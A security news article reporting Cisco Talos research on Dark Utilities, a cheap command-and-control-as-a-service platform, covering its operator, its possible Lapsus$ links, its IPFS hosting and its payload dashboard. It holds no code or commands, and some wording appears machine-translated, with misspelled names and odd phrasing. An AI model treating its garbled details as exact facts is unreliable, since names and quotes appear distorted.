Cisco Talos security researchers discovered a new tool called Dark Utilities that offers command-and-control or C2-as-a-Service (C2aaS) infrastructure to hackers looking for a quick and easy way to support their malicious operations .
Dark Utilities was released in early 2022 and currently has around 3,000 registered users, according to the latest data from security analytics and operations management company Securonix. The tool provides services for remote access, command execution, distributed denial of service (DDoS) attacks, and cryptocurrency mining operations.
Securinix described Dark Utilities as “a C2 platform that makes all functions available to attackers”. It supports adversaries familiar with Windows, Linux, macOS, Android, and Python-based implementations.
Dark Utilities is the brainchild of a relatively unknown cybercrime actor who goes by the nickname Inplex-sys. Cisco Talos assessed them as French speakers who also converse in English. Inplex-sys limited its activities to Telegram and Discord prior to the release of Dark Utilities.
Inplex-sys may have ties to the Lapsus$ cyber extortion group, which has preyed on Samsung, NVIDIA, Ubisoft, Okta, Globant, and others. Talos discovered an inplex-sys entry on Doxbin, a doxing site once owned and managed by now arrested 16-year-old member by Lapsus$. Inplex-sys recordings on Doxbin led Talos to believe they were either in Germany or France.
Dark Utilities uses the Interplanetary File System (IPFS) instead of HTTP/HTTPS for peer-to-peer file sharing, thereby excluding it from the realm of law enforcement and related intrusions. Like the Tor2Web network, IPFS is decentralized, gateway-controlled, and does not require an application installed on a computer to access its Content Distribution Network (CDN).
See more: Lazarus hackers exploit Log4j vulnerabilities to attack US energy companies
One of the most essential components of hacking, malicious or not, a C2 server, as its name suggests, serves as a central control point for targeted malware attacks. It allows the attack propagators to communicate with the victim system, send commands/new additional payloads and store stolen data.
Dark Utilities C2aaS offers all this for a starting price of a meager €9.99. Dark Utilities is hosted on both the Tor network and the open internet. “Dark Utilities’ dirt cheap subscription plan would encourage more amateurs and script kiddies to sign up for the service and launch attacks without having sufficient cyberattack knowledge,” said researchers at K7 Security.
“For example, anyone can use the RaaS revenue model to figure out how remote attacks would multiply with the adoption of C2aaS. The RaaS services usually appoint partners and offer a ransom cut. However, C2aaS would allow anyone to launch cyberattacks on any system without the required knowledge or resources.”
User authentication is done via Discord. Once authenticated, users are redirected to a dashboard where they are prompted to generate new payloads specific to the operating system on the target computer that the user/threat actors want to bully and deploy through the same dashboard.
“Choosing an operating system causes the platform to generate a command string that attackers typically embed in PowerShell or Bash scripts to make it easier to retrieve and run the payload on victim machines. An example of a payload targeting the Windows operating system is shown below,” Talon explained.
Besides the usual operating system, Dark Utilities also supports payload creation for Fivem and the underlying ARM64 and ARMV71 architectures to target embedded internet-connected devices such as routers, phones and Internet of Things (IoT) devices.
For payload/bot management, Dark Utilities has an administration panel that lists all victim systems. This allows users to control malicious operations in one place. The dashboard also provides insight into several attack metrics, such as: B. Server health and platform statistics.
Dark Utilities C2aaS dashboard | Source: Cisco Talos
Dark Utilities’ 71 Indicators of Compromise (IOCs) are available on the Securonix website.